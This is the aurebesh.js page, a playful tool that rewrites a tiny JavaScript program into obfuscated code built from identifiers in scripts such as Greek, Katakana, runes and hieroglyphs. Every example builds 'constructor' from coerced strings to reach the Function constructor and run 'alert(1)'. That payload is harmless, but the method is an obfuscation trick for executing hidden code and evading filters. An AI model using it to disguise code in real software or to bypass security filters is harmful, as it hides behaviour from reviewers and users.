aurebesh.js
AUREBESH.JS - TRANSLATE JAVASCRIPT TO OTHER WRITING SYSTEMS.
Type in a list of up to nine symbols in the input below. Your symbols will then be used to generate a short piece of valid JavaScript that you can execute without any extra code.

* Created by Martin Kleppe aka @aemkei.
* More hacks and creative coding at aem1k.com.

YOUR ALPHABET:
0day
Invalid identifier name: 0.
Read more here: https://mathiasbynens.be/notes/javascript-identifiers
The underlying example here is just an `alert(1)` - but more advanced programs are possible, too. Usually, the output is less than 140 chars and perfect for Twitter. You can also share the URL which updates while typing.

EXAMPLES
Here are some examples of real and imaginary writing systems. The first one Aurebesh is based on the most used alphabeth in the Star Wars galaxy.

AUREBESH
// ロコYㅣᗐΞΔᐳㅡ
ロ='',コ=!ロ+ロ,Y=!コ+ロ,ㅣ=ロ+{},ᗐ=コ[ロ++],Ξ=コ[Δ=ロ],ᐳ=++Δ+ロ,ㅡ=ㅣ[Δ+ᐳ],コ[ㅡ+=ㅣ[ロ]+(コ.Y+ㅣ)[ロ]+Y[ᐳ]+ᗐ+Ξ+コ[Δ]+ㅡ+ᗐ+ㅣ[ロ]+Ξ][ㅡ](Y[ロ]+Y[Δ]+コ[ᐳ]+Ξ+ᗐ+"(ロ)")()
KATAKANA
// アウセヌネハヘホミ
ア='',ウ=!ア+ア,セ=!ウ+ア,ヌ=ア+{},ネ=ウ[ア++],ハ=ウ[ヘ=ア],ホ=++ヘ+ア,ミ=ヌ[ヘ+ホ],ウ[ミ+=ヌ[ア]+(ウ.セ+ヌ)[ア]+セ[ホ]+ネ+ハ+ウ[ヘ]+ミ+ネ+ヌ[ア]+ハ][ミ](セ[ア]+セ[ヘ]+ウ[ホ]+ハ+ネ+"(ア)")()
GREEK
// πβεγμτφθλ
π='',β=!π+π,ε=!β+π,γ=π+{},μ=β[π++],τ=β[φ=π],θ=++φ+π,λ=γ[φ+θ],β[λ+=γ[π]+(β.ε+γ)[π]+ε[θ]+μ+τ+β[φ]+λ+μ+γ[π]+τ][λ](ε[π]+ε[φ]+β[θ]+τ+μ+"(π)")()
HANGUL
// ᅺᅻᅼᅽᅾᅿᆀᆁᆂᆃ
ᅺ='',ᅻ=!ᅺ+ᅺ,ᅼ=!ᅻ+ᅺ,ᅽ=ᅺ+{},ᅾ=ᅻ[ᅺ++],ᅿ=ᅻ[ᆀ=ᅺ],ᆁ=++ᆀ+ᅺ,ᆂ=ᅽ[ᆀ+ᆁ],ᅻ[ᆂ+=ᅽ[ᅺ]+(ᅻ.ᅼ+ᅽ)[ᅺ]+ᅼ[ᆁ]+ᅾ+ᅿ+ᅻ[ᆀ]+ᆂ+ᅾ+ᅽ[ᅺ]+ᅿ][ᆂ](ᅼ[ᅺ]+ᅼ[ᆀ]+ᅻ[ᆁ]+ᅿ+ᅾ+"(ᅺ)")()
THAI
// กวอซฝคงญฒ
ก='',ว=!ก+ก,อ=!ว+ก,ซ=ก+{},ฝ=ว[ก++],ค=ว[ง=ก],ญ=++ง+ก,ฒ=ซ[ง+ญ],ว[ฒ+=ซ[ก]+(ว.อ+ซ)[ก]+อ[ญ]+ฝ+ค+ว[ง]+ฒ+ฝ+ซ[ก]+ค][ฒ](อ[ก]+อ[ง]+ว[ญ]+ค+ฝ+"(ก)")()
CYRILLIC
// БДИЖЩЗЛЮФ
Б='',Д=!Б+Б,И=!Д+Б,Ж=Б+{},Щ=Д[Б++],З=Д[Л=Б],Ю=++Л+Б,Ф=Ж[Л+Ю],Д[Ф+=Ж[Б]+(Д.И+Ж)[Б]+И[Ю]+Щ+З+Д[Л]+Ф+Щ+Ж[Б]+З][Ф](И[Б]+И[Л]+Д[Ю]+З+Щ+"(Б)")()
GURMUKHI
// ਗਨਹਤਕੲਲੜਵ
ਗ='',ਨ=!ਗ+ਗ,ਹ=!ਨ+ਗ,ਤ=ਗ+{},ਕ=ਨ[ਗ++],ੲ=ਨ[ਲ=ਗ],ੜ=++ਲ+ਗ,ਵ=ਤ[ਲ+ੜ],ਨ[ਵ+=ਤ[ਗ]+(ਨ.ਹ+ਤ)[ਗ]+ਹ[ੜ]+ਕ+ੲ+ਨ[ਲ]+ਵ+ਕ+ਤ[ਗ]+ੲ][ਵ](ਹ[ਗ]+ਹ[ਲ]+ਨ[ੜ]+ੲ+ਕ+"(ਗ)")()
HEBREW
// אבגדהוחטכ
א='',ב=!א+א,ג=!ב+א,ד=א+{},ה=ב[א++],ו=ב[ח=א],ט=++ח+א,כ=ד[ח+ט],ב[כ+=ד[א]+(ב.ג+ד)[א]+ג[ט]+ה+ו+ב[ח]+כ+ה+ד[א]+ו][כ](ג[א]+ג[ח]+ב[ט]+ו+ה+"(א)")()
JAVANESE
// ꦊꦄꦌꦍꦎꦏꦐꦑꦒ
ꦊ='',ꦄ=!ꦊ+ꦊ,ꦌ=!ꦄ+ꦊ,ꦍ=ꦊ+{},ꦎ=ꦄ[ꦊ++],ꦏ=ꦄ[ꦐ=ꦊ],ꦑ=++ꦐ+ꦊ,ꦒ=ꦍ[ꦐ+ꦑ],ꦄ[ꦒ+=ꦍ[ꦊ]+(ꦄ.ꦌ+ꦍ)[ꦊ]+ꦌ[ꦑ]+ꦎ+ꦏ+ꦄ[ꦐ]+ꦒ+ꦎ+ꦍ[ꦊ]+ꦏ][ꦒ](ꦌ[ꦊ]+ꦌ[ꦐ]+ꦄ[ꦑ]+ꦏ+ꦎ+"(ꦊ)")()
YI
// ꆇꉄꉦꊗꀻꃋꆚꋕꐍ
ꆇ='',ꉄ=!ꆇ+ꆇ,ꉦ=!ꉄ+ꆇ,ꊗ=ꆇ+{},ꀻ=ꉄ[ꆇ++],ꃋ=ꉄ[ꆚ=ꆇ],ꋕ=++ꆚ+ꆇ,ꐍ=ꊗ[ꆚ+ꋕ],ꉄ[ꐍ+=ꊗ[ꆇ]+(ꉄ.ꉦ+ꊗ)[ꆇ]+ꉦ[ꋕ]+ꀻ+ꃋ+ꉄ[ꆚ]+ꐍ+ꀻ+ꊗ[ꆇ]+ꃋ][ꐍ](ꉦ[ꆇ]+ꉦ[ꆚ]+ꉄ[ꋕ]+ꃋ+ꀻ+"(ꆇ)")()
TELUGU
// జ్ఞా,తె,లు,గు,ణి,తా,ము,రా,బ,కి
జ్ఞా='',తె=!జ్ఞా+జ్ఞా,లు=!తె+జ్ఞా,గు=జ్ఞా+{},ణి=తె[జ్ఞా++],తా=తె[ము=జ్ఞా],రా=++ము+జ్ఞా,బ=గు[ము+రా],తె[బ+=గు[జ్ఞా]+(తె.లు+గు)[జ్ఞా]+లు[రా]+ణి+తా+తె[ము]+బ+ణి+గు[జ్ఞా]+తా][బ](లు[జ్ఞా]+లు[ము]+తె[రా]+తా+ణి+"(జ్ఞా)")()
RUNES
// ᚦᚢᚠᚻᛉᛊᛇᛟᛞ
ᚦ='',ᚢ=!ᚦ+ᚦ,ᚠ=!ᚢ+ᚦ,ᚻ=ᚦ+{},ᛉ=ᚢ[ᚦ++],ᛊ=ᚢ[ᛇ=ᚦ],ᛟ=++ᛇ+ᚦ,ᛞ=ᚻ[ᛇ+ᛟ],ᚢ[ᛞ+=ᚻ[ᚦ]+(ᚢ.ᚠ+ᚻ)[ᚦ]+ᚠ[ᛟ]+ᛉ+ᛊ+ᚢ[ᛇ]+ᛞ+ᛉ+ᚻ[ᚦ]+ᛊ][ᛞ](ᚠ[ᚦ]+ᚠ[ᛇ]+ᚢ[ᛟ]+ᛊ+ᛉ+"(ᚦ)")()
CARIAN
// 𐊾,𐋂,𐊼,𐊧,𐋀,𐊫,𐋇,𐊦,𐊣
𐊾='',𐋂=!𐊾+𐊾,𐊼=!𐋂+𐊾,𐊧=𐊾+{},𐋀=𐋂[𐊾++],𐊫=𐋂[𐋇=𐊾],𐊦=++𐋇+𐊾,𐊣=𐊧[𐋇+𐊦],𐋂[𐊣+=𐊧[𐊾]+(𐋂.𐊼+𐊧)[𐊾]+𐊼[𐊦]+𐋀+𐊫+𐋂[𐋇]+𐊣+𐋀+𐊧[𐊾]+𐊫][𐊣](𐊼[𐊾]+𐊼[𐋇]+𐋂[𐊦]+𐊫+𐋀+"(𐊾)")()
DIACRITICAL MARKS
// ò́̂,o̖̔̕,o̞̟̠,ò́̂̃,o̖̗̔̕,o̡̞̟̠,o̡̢̞̟̠̣,o̖̗̘̙̔̕,ò́̂̃̄
ò́̂='',o̖̔̕=!ò́̂+ò́̂,o̞̟̠=!o̖̔̕+ò́̂,ò́̂̃=ò́̂+{},o̖̗̔̕=o̖̔̕[ò́̂++],o̡̞̟̠=o̖̔̕[o̡̢̞̟̠̣=ò́̂],o̖̗̘̙̔̕=++o̡̢̞̟̠̣+ò́̂,ò́̂̃̄=ò́̂̃[o̡̢̞̟̠̣+o̖̗̘̙̔̕],o̖̔̕[ò́̂̃̄+=ò́̂̃[ò́̂]+(o̖̔̕.o̞̟̠+ò́̂̃)[ò́̂]+o̞̟̠[o̖̗̘̙̔̕]+o̖̗̔̕+o̡̞̟̠+o̖̔̕[o̡̢̞̟̠̣]+ò́̂̃̄+o̖̗̔̕+ò́̂̃[ò́̂]+o̡̞̟̠][ò́̂̃̄](o̞̟̠[ò́̂]+o̞̟̠[o̡̢̞̟̠̣]+o̖̔̕[o̖̗̘̙̔̕]+o̡̞̟̠+o̖̗̔̕+"(ò́̂)")()
ARABIC
// غػؼؽؾؿـفق
غ='',ػ=!غ+غ,ؼ=!ػ+غ,ؽ=غ+{},ؾ=ػ[غ++],ؿ=ػ[ـ=غ],ف=++ـ+غ,ق=ؽ[ـ+ف],ػ[ق+=ؽ[غ]+(ػ.ؼ+ؽ)[غ]+ؼ[ف]+ؾ+ؿ+ػ[ـ]+ق+ؾ+ؽ[غ]+ؿ][ق](ؼ[غ]+ؼ[ـ]+ػ[ف]+ؿ+ؾ+"(غ)")()
BUGINESE
// ᨆᨊᨎᨂᨇᨋᨏᨃᨅ
ᨆ='',ᨊ=!ᨆ+ᨆ,ᨎ=!ᨊ+ᨆ,ᨂ=ᨆ+{},ᨇ=ᨊ[ᨆ++],ᨋ=ᨊ[ᨏ=ᨆ],ᨃ=++ᨏ+ᨆ,ᨅ=ᨂ[ᨏ+ᨃ],ᨊ[ᨅ+=ᨂ[ᨆ]+(ᨊ.ᨎ+ᨂ)[ᨆ]+ᨎ[ᨃ]+ᨇ+ᨋ+ᨊ[ᨏ]+ᨅ+ᨇ+ᨂ[ᨆ]+ᨋ][ᨅ](ᨎ[ᨆ]+ᨎ[ᨏ]+ᨊ[ᨃ]+ᨋ+ᨇ+"(ᨆ)")()
ᐳㅣᐸ
// ᐳᐸㅣ
ᐳ='',ᐸ=!ᐳ+ᐳ,ㅣ=!ᐸ+ᐳ,ᐳᐳ=ᐳ+{},ᐳᐸ=ᐸ[ᐳ++],ᐳㅣ=ᐸ[ᐸᐳ=ᐳ],ᐸᐸ=++ᐸᐳ+ᐳ,ᐸㅣ=ᐳᐳ[ᐸᐳ+ᐸᐸ],ᐸ[ᐸㅣ+=ᐳᐳ[ᐳ]+(ᐸ.ㅣ+ᐳᐳ)[ᐳ]+ㅣ[ᐸᐸ]+ᐳᐸ+ᐳㅣ+ᐸ[ᐸᐳ]+ᐸㅣ+ᐳᐸ+ᐳᐳ[ᐳ]+ᐳㅣ][ᐸㅣ](ㅣ[ᐳ]+ㅣ[ᐸᐳ]+ᐸ[ᐸᐸ]+ᐳㅣ+ᐳᐸ+"(ᐳ)")()
OOO
// òŏôǒöőõȯōȍ
ò='',ŏ=!ò+ò,ô=!ŏ+ò,ǒ=ò+{},ö=ŏ[ò++],ő=ŏ[õ=ò],ȯ=++õ+ò,ō=ǒ[õ+ȯ],ŏ[ō+=ǒ[ò]+(ŏ.ô+ǒ)[ò]+ô[ȯ]+ö+ő+ŏ[õ]+ō+ö+ǒ[ò]+ő][ō](ô[ò]+ô[õ]+ŏ[ȯ]+ő+ö+"(ò)")()
RESERVED
// 𝖻𝗋𝖾𝖺𝗄,𝗍𝗁𝗋𝗈𝗐,𝖼𝖺𝗍𝖼𝗁,𝖼𝗈𝗇𝗌𝗍,𝗏𝖺𝗋,𝗋𝖾𝗍𝗎𝗋𝗇,𝖽𝖾𝖿𝖺𝗎𝗅𝗍,𝗍𝗁𝗂𝗌,𝗏𝗈𝗂𝖽
𝖻𝗋𝖾𝖺𝗄='',𝗍𝗁𝗋𝗈𝗐=!𝖻𝗋𝖾𝖺𝗄+𝖻𝗋𝖾𝖺𝗄,𝖼𝖺𝗍𝖼𝗁=!𝗍𝗁𝗋𝗈𝗐+𝖻𝗋𝖾𝖺𝗄,𝖼𝗈𝗇𝗌𝗍=𝖻𝗋𝖾𝖺𝗄+{},𝗏𝖺𝗋=𝗍𝗁𝗋𝗈𝗐[𝖻𝗋𝖾𝖺𝗄++],𝗋𝖾𝗍𝗎𝗋𝗇=𝗍𝗁𝗋𝗈𝗐[𝖽𝖾𝖿𝖺𝗎𝗅𝗍=𝖻𝗋𝖾𝖺𝗄],𝗍𝗁𝗂𝗌=++𝖽𝖾𝖿𝖺𝗎𝗅𝗍+𝖻𝗋𝖾𝖺𝗄,𝗏𝗈𝗂𝖽=𝖼𝗈𝗇𝗌𝗍[𝖽𝖾𝖿𝖺𝗎𝗅𝗍+𝗍𝗁𝗂𝗌],𝗍𝗁𝗋𝗈𝗐[𝗏𝗈𝗂𝖽+=𝖼𝗈𝗇𝗌𝗍[𝖻𝗋𝖾𝖺𝗄]+(𝗍𝗁𝗋𝗈𝗐.𝖼𝖺𝗍𝖼𝗁+𝖼𝗈𝗇𝗌𝗍)[𝖻𝗋𝖾𝖺𝗄]+𝖼𝖺𝗍𝖼𝗁[𝗍𝗁𝗂𝗌]+𝗏𝖺𝗋+𝗋𝖾𝗍𝗎𝗋𝗇+𝗍𝗁𝗋𝗈𝗐[𝖽𝖾𝖿𝖺𝗎𝗅𝗍]+𝗏𝗈𝗂𝖽+𝗏𝖺𝗋+𝖼𝗈𝗇𝗌𝗍[𝖻𝗋𝖾𝖺𝗄]+𝗋𝖾𝗍𝗎𝗋𝗇][𝗏𝗈𝗂𝖽](𝖼𝖺𝗍𝖼𝗁[𝖻𝗋𝖾𝖺𝗄]+𝖼𝖺𝗍𝖼𝗁[𝖽𝖾𝖿𝖺𝗎𝗅𝗍]+𝗍𝗁𝗋𝗈𝗐[𝗍𝗁𝗂𝗌]+𝗋𝖾𝗍𝗎𝗋𝗇+𝗏𝖺𝗋+"(𝖻𝗋𝖾𝖺𝗄)")()
DEUTSCH
// Ä,ja,nein,ö,Ü,sch,Schnitzel,Bier,ß
Ä='',ja=!Ä+Ä,nein=!ja+Ä,ö=Ä+{},Ü=ja[Ä++],sch=ja[Schnitzel=Ä],Bier=++Schnitzel+Ä,ß=ö[Schnitzel+Bier],ja[ß+=ö[Ä]+(ja.nein+ö)[Ä]+nein[Bier]+Ü+sch+ja[Schnitzel]+ß+Ü+ö[Ä]+sch][ß](nein[Ä]+nein[Schnitzel]+ja[Bier]+sch+Ü+"(Ä)")()
SPACE
// _
_='',__=!_+_,___=!__+_,____=_+{},_____=__[_++],______=__[_______=_],________=++_______+_,_________=____[_______+________],__[_________+=____[_]+(__.___+____)[_]+___[________]+_____+______+__[_______]+_________+_____+____[_]+______][_________](___[_]+___[_______]+__[________]+______+_____+"(_)")()
SOLFÈGE
// Do,Re,Mi,Fa,Sol,La,Si
Do='',Re=!Do+Do,Mi=!Re+Do,Fa=Do+{},Sol=Re[Do++],La=Re[Si=Do],DoDo=++Si+Do,DoRe=Fa[Si+DoDo],Re[DoRe+=Fa[Do]+(Re.Mi+Fa)[Do]+Mi[DoDo]+Sol+La+Re[Si]+DoRe+Sol+Fa[Do]+La][DoRe](Mi[Do]+Mi[Si]+Re[DoDo]+La+Sol+"(Do)")()
XXX
// xX
x='',X=!x+x,xx=!X+x,xX=x+{},Xx=X[x++],XX=X[Xxx=x],XxX=++Xxx+x,xxx=xX[Xxx+XxX],X[xxx+=xX[x]+(X.xx+xX)[x]+xx[XxX]+Xx+XX+X[Xxx]+xxx+Xx+xX[x]+XX][xxx](xx[x]+xx[Xxx]+X[XxX]+XX+Xx+"(x)")()
ROMAN
// IVXLCDM
I='',V=!I+I,X=!V+I,L=I+{},C=V[I++],D=V[M=I],II=++M+I,IV=L[M+II],V[IV+=L[I]+(V.X+L)[I]+X[II]+C+D+V[M]+IV+C+L[I]+D][IV](X[I]+X[M]+V[II]+D+C+"(I)")()
KANNADA
// ಠಉನಊಝಏೡಖತ
ಠ='',ಉ=!ಠ+ಠ,ನ=!ಉ+ಠ,ಊ=ಠ+{},ಝ=ಉ[ಠ++],ಏ=ಉ[ೡ=ಠ],ಖ=++ೡ+ಠ,ತ=ಊ[ೡ+ಖ],ಉ[ತ+=ಊ[ಠ]+(ಉ.ನ+ಊ)[ಠ]+ನ[ಖ]+ಝ+ಏ+ಉ[ೡ]+ತ+ಝ+ಊ[ಠ]+ಏ][ತ](ನ[ಠ]+ನ[ೡ]+ಉ[ಖ]+ಏ+ಝ+"(ಠ)")()
ICELANDIC
// ÞÐÓÆÝHÉTÍ
Þ='',Ð=!Þ+Þ,Ó=!Ð+Þ,Æ=Þ+{},Ý=Ð[Þ++],H=Ð[É=Þ],T=++É+Þ,Í=Æ[É+T],Ð[Í+=Æ[Þ]+(Ð.Ó+Æ)[Þ]+Ó[T]+Ý+H+Ð[É]+Í+Ý+Æ[Þ]+H][Í](Ó[Þ]+Ó[É]+Ð[T]+H+Ý+"(Þ)")()
TIFINAGH
// ⴼⵊⵏⵂⵗⵓⴻⵐⵜ
ⴼ='',ⵊ=!ⴼ+ⴼ,ⵏ=!ⵊ+ⴼ,ⵂ=ⴼ+{},ⵗ=ⵊ[ⴼ++],ⵓ=ⵊ[ⴻ=ⴼ],ⵐ=++ⴻ+ⴼ,ⵜ=ⵂ[ⴻ+ⵐ],ⵊ[ⵜ+=ⵂ[ⴼ]+(ⵊ.ⵏ+ⵂ)[ⴼ]+ⵏ[ⵐ]+ⵗ+ⵓ+ⵊ[ⴻ]+ⵜ+ⵗ+ⵂ[ⴼ]+ⵓ][ⵜ](ⵏ[ⴼ]+ⵏ[ⴻ]+ⵊ[ⵐ]+ⵓ+ⵗ+"(ⴼ)")()
VAI
// ꔀꕐꖠꔢꖈꖕꔈꔉꔁ
ꔀ='',ꕐ=!ꔀ+ꔀ,ꖠ=!ꕐ+ꔀ,ꔢ=ꔀ+{},ꖈ=ꕐ[ꔀ++],ꖕ=ꕐ[ꔈ=ꔀ],ꔉ=++ꔈ+ꔀ,ꔁ=ꔢ[ꔈ+ꔉ],ꕐ[ꔁ+=ꔢ[ꔀ]+(ꕐ.ꖠ+ꔢ)[ꔀ]+ꖠ[ꔉ]+ꖈ+ꖕ+ꕐ[ꔈ]+ꔁ+ꖈ+ꔢ[ꔀ]+ꖕ][ꔁ](ꖠ[ꔀ]+ꖠ[ꔈ]+ꕐ[ꔉ]+ꖕ+ꖈ+"(ꔀ)")()
OGHAM
// ᚁᚆᚂᚇᚃᚈ
ᚁ='',ᚆ=!ᚁ+ᚁ,ᚂ=!ᚆ+ᚁ,ᚇ=ᚁ+{},ᚃ=ᚆ[ᚁ++],ᚈ=ᚆ[ᚁᚁ=ᚁ],ᚁᚆ=++ᚁᚁ+ᚁ,ᚁᚂ=ᚇ[ᚁᚁ+ᚁᚆ],ᚆ[ᚁᚂ+=ᚇ[ᚁ]+(ᚆ.ᚂ+ᚇ)[ᚁ]+ᚂ[ᚁᚆ]+ᚃ+ᚈ+ᚆ[ᚁᚁ]+ᚁᚂ+ᚃ+ᚇ[ᚁ]+ᚈ][ᚁᚂ](ᚂ[ᚁ]+ᚂ[ᚁᚁ]+ᚆ[ᚁᚆ]+ᚈ+ᚃ+"(ᚁ)")()
SYMBOLS
// _ʽːᆢ〱〳ㅡㅣㆍ
_='',ʽ=!_+_,ː=!ʽ+_,ᆢ=_+{},〱=ʽ[_++],〳=ʽ[ㅡ=_],ㅣ=++ㅡ+_,ㆍ=ᆢ[ㅡ+ㅣ],ʽ[ㆍ+=ᆢ[_]+(ʽ.ː+ᆢ)[_]+ː[ㅣ]+〱+〳+ʽ[ㅡ]+ㆍ+〱+ᆢ[_]+〳][ㆍ](ː[_]+ː[ㅡ]+ʽ[ㅣ]+〳+〱+"(_)")()
KANJI
// 㒓㒲㒳㒴㒵㒶㒷㒸㒺
㒓='',㒲=!㒓+㒓,㒳=!㒲+㒓,㒴=㒓+{},㒵=㒲[㒓++],㒶=㒲[㒷=㒓],㒸=++㒷+㒓,㒺=㒴[㒷+㒸],㒲[㒺+=㒴[㒓]+(㒲.㒳+㒴)[㒓]+㒳[㒸]+㒵+㒶+㒲[㒷]+㒺+㒵+㒴[㒓]+㒶][㒺](㒳[㒓]+㒳[㒷]+㒲[㒸]+㒶+㒵+"(㒓)")()
HIEROGLYPHS
// 𓅂,𓂀,𓁄,𓊎,𓆣,𓊝,𓇎,𓏢,𓆗
𓅂='',𓂀=!𓅂+𓅂,𓁄=!𓂀+𓅂,𓊎=𓅂+{},𓆣=𓂀[𓅂++],𓊝=𓂀[𓇎=𓅂],𓏢=++𓇎+𓅂,𓆗=𓊎[𓇎+𓏢],𓂀[𓆗+=𓊎[𓅂]+(𓂀.𓁄+𓊎)[𓅂]+𓁄[𓏢]+𓆣+𓊝+𓂀[𓇎]+𓆗+𓆣+𓊎[𓅂]+𓊝][𓆗](𓁄[𓅂]+𓁄[𓇎]+𓂀[𓏢]+𓊝+𓆣+"(𓅂)")()
LINEAR B
// 𐂃,𐃨,𐂝,𐃌,𐁉,𐃵,𐂓,𐀜,𐂠
𐂃='',𐃨=!𐂃+𐂃,𐂝=!𐃨+𐂃,𐃌=𐂃+{},𐁉=𐃨[𐂃++],𐃵=𐃨[𐂓=𐂃],𐀜=++𐂓+𐂃,𐂠=𐃌[𐂓+𐀜],𐃨[𐂠+=𐃌[𐂃]+(𐃨.𐂝+𐃌)[𐂃]+𐂝[𐀜]+𐁉+𐃵+𐃨[𐂓]+𐂠+𐁉+𐃌[𐂃]+𐃵][𐂠](𐂝[𐂃]+𐂝[𐂓]+𐃨[𐀜]+𐃵+𐁉+"(𐂃)")()
DEVANAGARI
// क,ख,ग,घ,ङ,च,छ,ज,झ
क='',ख=!क+क,ग=!ख+क,घ=क+{},ङ=ख[क++],च=ख[छ=क],ज=++छ+क,झ=घ[छ+ज],ख[झ+=घ[क]+(ख.ग+घ)[क]+ग[ज]+ङ+च+ख[छ]+झ+ङ+घ[क]+च][झ](ग[क]+ग[छ]+ख[ज]+च+ङ+"(क)")()
ABC
// ABCDEFGHI
A='',B=!A+A,C=!B+A,D=A+{},E=B[A++],F=B[G=A],H=++G+A,I=D[G+H],B[I+=D[A]+(B.C+D)[A]+C[H]+E+F+B[G]+I+E+D[A]+F][I](C[A]+C[G]+B[H]+F+E+"(A)")()
X VARIABLES
// ⵝ,Ⲭ,ᚷ,ꓫ,𐊐,𐊴,Х,Χ,X
ⵝ='',Ⲭ=!ⵝ+ⵝ,ᚷ=!Ⲭ+ⵝ,ꓫ=ⵝ+{},𐊐=Ⲭ[ⵝ++],𐊴=Ⲭ[Х=ⵝ],Χ=++Х+ⵝ,X=ꓫ[Х+Χ],Ⲭ[X+=ꓫ[ⵝ]+(Ⲭ.ᚷ+ꓫ)[ⵝ]+ᚷ[Χ]+𐊐+𐊴+Ⲭ[Х]+X+𐊐+ꓫ[ⵝ]+𐊴][X](ᚷ[ⵝ]+ᚷ[Х]+Ⲭ[Χ]+𐊴+𐊐+"(ⵝ)")()
EMOTICONS
// ó‿ó,σ_σ,δﺡό,סּ_סּ,ಠ_ಠ,ö‿o,oﺡo,σ_o,ಠ‿ಠ
ó‿ó='',σ_σ=!ó‿ó+ó‿ó,δﺡό=!σ_σ+ó‿ó,סּ_סּ=ó‿ó+{},ಠ_ಠ=σ_σ[ó‿ó++],ö‿o=σ_σ[oﺡo=ó‿ó],σ_o=++oﺡo+ó‿ó,ಠ‿ಠ=סּ_סּ[oﺡo+σ_o],σ_σ[ಠ‿ಠ+=סּ_סּ[ó‿ó]+(σ_σ.δﺡό+סּ_סּ)[ó‿ó]+δﺡό[σ_o]+ಠ_ಠ+ö‿o+σ_σ[oﺡo]+ಠ‿ಠ+ಠ_ಠ+סּ_סּ[ó‿ó]+ö‿o][ಠ‿ಠ](δﺡό[ó‿ó]+δﺡό[oﺡo]+σ_σ[σ_o]+ö‿o+ಠ_ಠ+"(ó‿ó)")()
SLASH
// 〳
〳='',〳〳=!〳+〳,〳〳〳=!〳〳+〳,〳〳〳〳=〳+{},〳〳〳〳〳=〳〳[〳++],〳〳〳〳〳〳=〳〳[〳〳〳〳〳〳〳=〳],〳〳〳〳〳〳〳〳=++〳〳〳〳〳〳〳+〳,〳〳〳〳〳〳〳〳〳=〳〳〳〳[〳〳〳〳〳〳〳+〳〳〳〳〳〳〳〳],〳〳[〳〳〳〳〳〳〳〳〳+=〳〳〳〳[〳]+(〳〳.〳〳〳+〳〳〳〳)[〳]+〳〳〳[〳〳〳〳〳〳〳〳]+〳〳〳〳〳+〳〳〳〳〳〳+〳〳[〳〳〳〳〳〳〳]+〳〳〳〳〳〳〳〳〳+〳〳〳〳〳+〳〳〳〳[〳]+〳〳〳〳〳〳][〳〳〳〳〳〳〳〳〳](〳〳〳[〳]+〳〳〳[〳〳〳〳〳〳〳]+〳〳[〳〳〳〳〳〳〳〳]+〳〳〳〳〳〳+〳〳〳〳〳+"(〳)")()
DOTS
// ⵗ
ⵗ='',ⵗⵗ=!ⵗ+ⵗ,ⵗⵗⵗ=!ⵗⵗ+ⵗ,ⵗⵗⵗⵗ=ⵗ+{},ⵗⵗⵗⵗⵗ=ⵗⵗ[ⵗ++],ⵗⵗⵗⵗⵗⵗ=ⵗⵗ[ⵗⵗⵗⵗⵗⵗⵗ=ⵗ],ⵗⵗⵗⵗⵗⵗⵗⵗ=++ⵗⵗⵗⵗⵗⵗⵗ+ⵗ,ⵗⵗⵗⵗⵗⵗⵗⵗⵗ=ⵗⵗⵗⵗ[ⵗⵗⵗⵗⵗⵗⵗ+ⵗⵗⵗⵗⵗⵗⵗⵗ],ⵗⵗ[ⵗⵗⵗⵗⵗⵗⵗⵗⵗ+=ⵗⵗⵗⵗ[ⵗ]+(ⵗⵗ.ⵗⵗⵗ+ⵗⵗⵗⵗ)[ⵗ]+ⵗⵗⵗ[ⵗⵗⵗⵗⵗⵗⵗⵗ]+ⵗⵗⵗⵗⵗ+ⵗⵗⵗⵗⵗⵗ+ⵗⵗ[ⵗⵗⵗⵗⵗⵗⵗ]+ⵗⵗⵗⵗⵗⵗⵗⵗⵗ+ⵗⵗⵗⵗⵗ+ⵗⵗⵗⵗ[ⵗ]+ⵗⵗⵗⵗⵗⵗ][ⵗⵗⵗⵗⵗⵗⵗⵗⵗ](ⵗⵗⵗ[ⵗ]+ⵗⵗⵗ[ⵗⵗⵗⵗⵗⵗⵗ]+ⵗⵗ[ⵗⵗⵗⵗⵗⵗⵗⵗ]+ⵗⵗⵗⵗⵗⵗ+ⵗⵗⵗⵗⵗ+"(ⵗ)")()
FILLER
// ﾠ,ﾠ‌,ﾠ‌‌,ﾠ‌‌‌,ﾠ‌‌‌‌,ﾠ‌‌‌‌‌,ﾠ‌‌‌‌‌‌,ﾠ‌‌‌‌‌‌‌
ﾠ='',ﾠ‌=!ﾠ+ﾠ,ﾠ‌‌=!ﾠ‌+ﾠ,ﾠ‌‌‌=ﾠ+{},ﾠ‌‌‌‌=ﾠ‌[ﾠ++],ﾠ‌‌‌‌‌=ﾠ‌[ﾠ‌‌‌‌‌‌=ﾠ],ﾠ‌‌‌‌‌‌‌=++ﾠ‌‌‌‌‌‌+ﾠ,ﾠﾠ=ﾠ‌‌‌[ﾠ‌‌‌‌‌‌+ﾠ‌‌‌‌‌‌‌],ﾠ‌[ﾠﾠ+=ﾠ‌‌‌[ﾠ]+(ﾠ‌.ﾠ‌‌+ﾠ‌‌‌)[ﾠ]+ﾠ‌‌[ﾠ‌‌‌‌‌‌‌]+ﾠ‌‌‌‌+ﾠ‌‌‌‌‌+ﾠ‌[ﾠ‌‌‌‌‌‌]+ﾠﾠ+ﾠ‌‌‌‌+ﾠ‌‌‌[ﾠ]+ﾠ‌‌‌‌‌][ﾠﾠ](ﾠ‌‌[ﾠ]+ﾠ‌‌[ﾠ‌‌‌‌‌‌]+ﾠ‌[ﾠ‌‌‌‌‌‌‌]+ﾠ‌‌‌‌‌+ﾠ‌‌‌‌+"(ﾠ)")()
CREE
// ᐁᐃᐊᐅᐄᐋᐆᐗᐒ
ᐁ='',ᐃ=!ᐁ+ᐁ,ᐊ=!ᐃ+ᐁ,ᐅ=ᐁ+{},ᐄ=ᐃ[ᐁ++],ᐋ=ᐃ[ᐆ=ᐁ],ᐗ=++ᐆ+ᐁ,ᐒ=ᐅ[ᐆ+ᐗ],ᐃ[ᐒ+=ᐅ[ᐁ]+(ᐃ.ᐊ+ᐅ)[ᐁ]+ᐊ[ᐗ]+ᐄ+ᐋ+ᐃ[ᐆ]+ᐒ+ᐄ+ᐅ[ᐁ]+ᐋ][ᐒ](ᐊ[ᐁ]+ᐊ[ᐆ]+ᐃ[ᐗ]+ᐋ+ᐄ+"(ᐁ)")()
HANGUL NUMBERS
// ﾠ7,ﾠ2,ﾠ4,ﾠ9,ﾠ1,ﾠ3,ﾠ5,ﾠ8,ﾠ6
